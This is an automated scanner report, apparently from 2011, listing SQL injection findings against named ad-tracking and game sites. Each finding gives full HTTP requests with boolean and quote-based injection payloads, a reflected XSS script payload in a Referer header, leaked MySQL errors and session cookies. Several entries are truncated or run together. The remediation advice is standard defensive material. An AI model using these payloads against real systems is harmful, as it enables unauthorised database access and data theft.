XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, SQL Injection

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://assets.rubiconproject.com/static/rtb/sync-min.html [REST URL parameter 3] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://assets.rubiconproject.com
Path:	/static/rtb/sync-min.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /static/rtb/sync-min.html'%20and%201%3d1--%20 HTTP/1.1
Host: assets.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=4252/4762; rdk15=0; ses15=4762^1

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 234
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 09 Jan 2011 02:02:09 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb/sync-min.html' and 1=1-- was not found o
...[SNIP]...
</p>
</body></html>

Request 2

GET /static/rtb/sync-min.html'%20and%201%3d2--%20 HTTP/1.1
Host: assets.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=4252/4762; rdk15=0; ses15=4762^1

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 325
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 09 Jan 2011 02:02:09 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb/sync-min.html' and 1=2-- was not found o
...[SNIP]...
</p>
<hr>
<address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address>
</body></html>

1.2. http://assets.rubiconproject.com/static/rtb/sync-min.html/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://assets.rubiconproject.com
Path:	/static/rtb/sync-min.html/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /static/rtb'%20and%201%3d1--%20/sync-min.html/ HTTP/1.1
Host: assets.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rdk15=0; ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rdk=4252/4762; ses15=4762^1; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 235
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 09 Jan 2011 02:03:54 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb' and 1=1-- /sync-min.html/ was not found
...[SNIP]...
</p>
</body></html>

Request 2

GET /static/rtb'%20and%201%3d2--%20/sync-min.html/ HTTP/1.1
Host: assets.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rdk15=0; ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rdk=4252/4762; ses15=4762^1; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 326
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 09 Jan 2011 02:03:54 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb' and 1=2-- /sync-min.html/ was not found
...[SNIP]...
</p>
<hr>
<address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address>
</body></html>

1.3. http://assets.rubiconproject.com/static/rtb/sync-min.html/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://assets.rubiconproject.com
Path:	/static/rtb/sync-min.html/

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 21123539'%20or%201%3d1--%20 and 21123539'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /static/rtb/sync-min.html21123539'%20or%201%3d1--%20/ HTTP/1.1
Host: assets.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rdk15=0; ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rdk=4252/4762; ses15=4762^1; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 242
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 09 Jan 2011 02:03:55 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb/sync-min.html21123539' or 1=1-- / was not
...[SNIP]...
</p>
</body></html>

Request 2

GET /static/rtb/sync-min.html21123539'%20or%201%3d2--%20/ HTTP/1.1
Host: assets.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rdk15=0; ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rdk=4252/4762; ses15=4762^1; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 333
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 09 Jan 2011 02:03:55 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb/sync-min.html21123539' or 1=2-- / was not
...[SNIP]...
</p>
<hr>
<address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address>
</body></html>

1.4. http://clubpogo-games.pogo.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://clubpogo-games.pogo.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 17880153%20or%201%3d1--%20 and 17880153%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?117880153%20or%201%3d1--%20=1 HTTP/1.1
Host: clubpogo-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Set-Cookie: prod.JID=65DADE84E709C901040324B63D290171.000033; Domain=.pogo.com; Path=/
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606376960931499; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:07:22 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:07:22 GMT
Server: Apache-Coyote/1.1
Content-Length: 104734

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<a class="navlink" href="http://www.pogo.com/action/pogo/createAccount.do?returnType=allGames&returnValue=allgames%7CplayersOnline%7Cnull&pageSection=header_reg" target="_top">Register</a></li>



















                   <li id="tn-downloads"><a class="navlink" href="http://download-games.pogo.com/?site=pogo&refid=headernav_fp_pogotab&ifw=756&pageSection=header_downloads&ifh=210&lkey=x" target="_top" id="downloads-link">Downloads</a></li>


























                       <li id="tn-iphone">
                           <a href="/hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp?pageSection=header_iphone" target="_top" class="navlink">IPHONE</a>
                       </li>




       </ul>


</div>

<div id="page-wrapper" class="clearfix">



<div id="stepSize" style="display:none;">20</div>
<div id="totalItems" style="display:none;">44</div>
<div id="removeFavoritesLocalizedText" style="display:none;">Remove from Favorites </div>
<div id="addFavoritesLocalizedText" style="display:none;">Add to Favorites</div>







       <div id="catBelt">
           <ul id="catList" class="items10">










                   <li id="allgames" >



<a href="http://www.pogo.com/all-games?pageSection=homecat_allgames">
                                   All Games
                               </a>












                   </li>




                   <li id="puzzle" >




<a href="http://puzzle-games.pogo.com/?pageSection=homecat_puzzle">
                                   Puzzle<br/>Games
                               </a>











                   </li>




                   <li id="board" >

...[SNIP]...

Request 2

GET /?117880153%20or%201%3d2--%20=1 HTTP/1.1
Host: clubpogo-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Set-Cookie: prod.JID=1CE604B86F6E71704329681DD1F7145C.000305; Domain=.pogo.com; Path=/
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606402730718127; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:07:22 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:07:22 GMT
Server: Apache-Coyote/1.1
Content-Length: 104744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<a class="navlink" href="http://www.pogo.com/action/pogo/createAccount.do?returnType=allGames&returnValue=onlineFreeTrial%7CplayersOnline%7Cnull&pageSection=header_reg" target="_top">Register</a></li>



















                   <li id="tn-downloads"><a class="navlink" href="http://download-games.pogo.com/?site=pogo&refid=headernav_fp_pogotab&ifw=756&pageSection=header_downloads&ifh=210&lkey=x" target="_top" id="downloads-link">Downloads</a></li>


























                       <li id="tn-iphone">
                           <a href="/hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp?pageSection=header_iphone" target="_top" class="navlink">IPHONE</a>
                       </li>




       </ul>


</div>

<div id="page-wrapper" class="clearfix">



<div id="stepSize" style="display:none;">20</div>
<div id="totalItems" style="display:none;">44</div>
<div id="removeFavoritesLocalizedText" style="display:none;">Remove from Favorites </div>
<div id="addFavoritesLocalizedText" style="display:none;">Add to Favorites</div>







       <div id="catBelt">
           <ul id="catList" class="items10">










                   <li id="allgames" >



<a href="http://www.pogo.com/all-games?pageSection=homecat_allgames">
                                   All Games
                               </a>












                   </li>




                   <li id="puzzle" >




<a href="http://puzzle-games.pogo.com/?pageSection=homecat_puzzle">
                                   Puzzle<br/>Games
                               </a>











                   </li>




                   <li id="board"
...[SNIP]...

1.5. http://game3.pogo.com/room/game/game.jsp [ahst parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://game3.pogo.com
Path:	/room/game/game.jsp

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Length: 682
Content-Type: text/html

<br />
<b>Fatal error</b>: Uncaught exception 'DBException' with message 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''51270''' at line 1' in /var/data/adventv2/htdocs/tracking/AdventDBMySQL.class.php:204
Stack trace:
#0
...[SNIP]...

Request 2

GET /1x1.php?51270'' HTTP/1.1
Host: link.mavnt.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/action/pogo/confirmation.do
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

1.10. http://link.mavnt.com/1x1.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://link.mavnt.com
Path:	/1x1.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /1x1.php?1'=1 HTTP/1.1
Host: link.mavnt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Length: 675
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Uncaught exception 'DBException' with message 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1' in /var/data/adventv2/htdocs/tracking/AdventDBMySQL.class.php:204
Stack trace:
#0 /var/d
...[SNIP]...

Request 2

GET /1x1.php?1''=1 HTTP/1.1
Host: link.mavnt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;

1.11. http://link.mavnt.com/1x1_map.php [51270 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://link.mavnt.com
Path:	/1x1_map.php

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /1x1_map.php?51270' HTTP/1.1
Host: link.mavnt.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/action/pogo/confirmation.do
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Length: 682
Content-Type: text/html

<br />
<b>Fatal error</b>: Uncaught exception 'DBException' with message 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''51270''' at line 1' in /var/data/adventv2/htdocs/tracking/AdventDBMySQL.class.php:204
Stack trace:
#0
...[SNIP]...

Request 2

GET /1x1_map.php?51270'' HTTP/1.1
Host: link.mavnt.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/action/pogo/confirmation.do
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

1.12. http://link.mavnt.com/1x1_map.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://link.mavnt.com
Path:	/1x1_map.php

Severity:	High
Confidence:	Certain
Host:	http://www.pixeltrack66.com
Path:	/mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExit&orig=CD99&s=MQExit&c=409

Issue detail

The mt_clk cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the mt_clk cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExit&orig=CD99&s=MQExit&c=409 HTTP/1.1
Host: www.pixeltrack66.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mt_clk=54267db83a49b89cd0644d669488302a'; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;

Response 1

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 05:13:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.9
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a%27; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 202

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''54267db83a49b89cd0644d669488302a'' and record_adjust2=1' at line 2

Request 2

GET /mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExit&orig=CD99&s=MQExit&c=409 HTTP/1.1
Host: www.pixeltrack66.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mt_clk=54267db83a49b89cd0644d669488302a''; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;

Response 2

HTTP/1.1 302 Found
Date: Sun, 09 Jan 2011 05:13:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.9
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a%27%27; path=/
Location: http://www.yourpurecrushes.com/hv1/blender_redirect.php?web_id=CD1&&web_id=e99MQExit&orig=CD99&s=MQExit&c=409
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

1.16. http://www.pixeltrack66.com/mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExitPop&orig=CD99&s=MQExit&c=409 [mt_clk cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pixeltrack66.com
Path:	/mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExitPop&orig=CD99&s=MQExit&c=409

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExitPop&orig=CD99&s=MQExit&c=409 HTTP/1.1
Host: www.pixeltrack66.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mt_clk=54267db83a49b89cd0644d669488302a'; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;

Response 1

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 05:14:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.9
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a%27; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 202

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''54267db83a49b89cd0644d669488302a'' and record_adjust2=1' at line 2

Request 2

GET /mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExitPop&orig=CD99&s=MQExit&c=409 HTTP/1.1
Host: www.pixeltrack66.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mt_clk=54267db83a49b89cd0644d669488302a''; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;

Response 2

HTTP/1.1 302 Found
Date: Sun, 09 Jan 2011 05:14:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.9
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a%27%27; path=/
Location: http://www.yourpurecrushes.com/hv1/blender_redirect.php?web_id=CD1&&web_id=e99MQExitPop&orig=CD99&s=MQExit&c=409
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

1.17. http://www.pixeltrack66.com/mt/x2a40344g4q2/&subid1=MQThankYou&subid2=CD99&subid3=409&subid4= [mt_clk cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pixeltrack66.com
Path:	/mt/x2a40344g4q2/&subid1=MQThankYou&subid2=CD99&subid3=409&subid4=

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /mt/x2a40344g4q2/&subid1=MQThankYou&subid2=CD99&subid3=409&subid4= HTTP/1.1
Host: www.pixeltrack66.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mt_clk=54267db83a49b89cd0644d669488302a'; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;

Response 1

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 05:14:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.9
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a%27; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 202

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''54267db83a49b89cd0644d669488302a'' and record_adjust2=1' at line 2

Request 2

GET /mt/x2a40344g4q2/&subid1=MQThankYou&subid2=CD99&subid3=409&subid4= HTTP/1.1
Host: www.pixeltrack66.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mt_clk=54267db83a49b89cd0644d669488302a''; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;

Response 2

HTTP/1.1 302 Found
Date: Sun, 09 Jan 2011 05:14:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.9
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
